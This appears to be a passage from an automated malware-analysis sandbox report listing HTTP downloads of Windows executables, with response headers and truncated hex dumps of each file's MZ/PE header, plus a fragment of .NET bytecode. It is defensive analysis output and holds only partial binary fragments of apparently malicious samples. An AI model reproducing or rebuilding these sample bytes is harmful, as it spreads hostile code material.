63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Tue, 20 Feb 2024 23:22:44 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=1a592247.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5b b2 68 ef 1f d3 06 bc 1f d3 06 bc 1f d3 06 bc 70 a5 ad bc 06 d3 06 bc 70 a5 98 bc 0c d3 06 bc 70 a5 ac bc 74 d3 06 bc 16 ab 95 bc 18 d3 06 bc 1f d3 07 bc 77 d3 06 bc 70 a5 a9 bc 1e d3 06 bc 70 a5 9c bc 1e d3 06 bc 70 a5 9b bc 1e d3 06 bc 52 69 63 68 1f d3 06 bc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 18 37 5c 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ac 01 00 00 e4 3f 00 00 00 00 00 af 15 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 41 00 00 04 00 00 ff 80 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 e0 01 00 50 00 00 00 00 50 41 00 d0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de ab 01 00 00 10 00 00 00 ac 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 29 00 00 00 c0 01 00 00 2a 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5f 3f 00 00 f0 01 00 00 2c 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 26 00 00 00 50 41 00 00 28 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 20 Feb 2024 23:22:46 GMTContent-Type: application/octet-streamContent-Length: 4754167Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=may.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hymOolv1juA%2FtTW6obbOzjvIuejBZovzH0jNEXEljH7MQcs7qYBtYpMQ0PuMtsHTjTtSJA3aLUptC4HI7bR%2BFdCMlZHHbeR3Tm8P%2FMuT%2B1nwJdjyEfHoNfk043Zom5ttFcPWmZgW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 858a7e56ea9f436f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 20 Feb 2024 23:22:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 20 Feb 2024 23:15:01 GMTETag: "2d800-611d8612deca6"Accept-Ranges: bytesContent-Length: 186368Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 2a d4 5c 24 4b ba 0f 24 4b ba 0f 24 4b ba 0f 4b 3d 11 0f 3d 4b ba 0f 4b 3d 24 0f 37 4b ba 0f 4b 3d 10 0f 48 4b ba 0f 2d 33 29 0f 23 4b ba 0f 24 4b bb 0f 4c 4b ba 0f 4b 3d 15 0f 25 4b ba 0f 4b 3d 20 0f 25 4b ba 0f 4b 3d 27 0f 25 4b ba 0f 52 69 63 68 24 4b ba 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e2 93 49 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 56 02 00 00 e4 3f 00 00 00 00 00 d7 15 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 42 00 00 04 00 00 fb 90 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 90 02 00 50 00 00 00 00 00 42 00 d0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e 54 02 00 00 10 00 00 00 56 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 29 00 00 00 70 02 00 00 2a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5f 3f 00 00 a0 02 00 00 2c 00 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 26 00 00 00 00 42 00 00 28 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:22:57 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:02 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:04 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:05 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 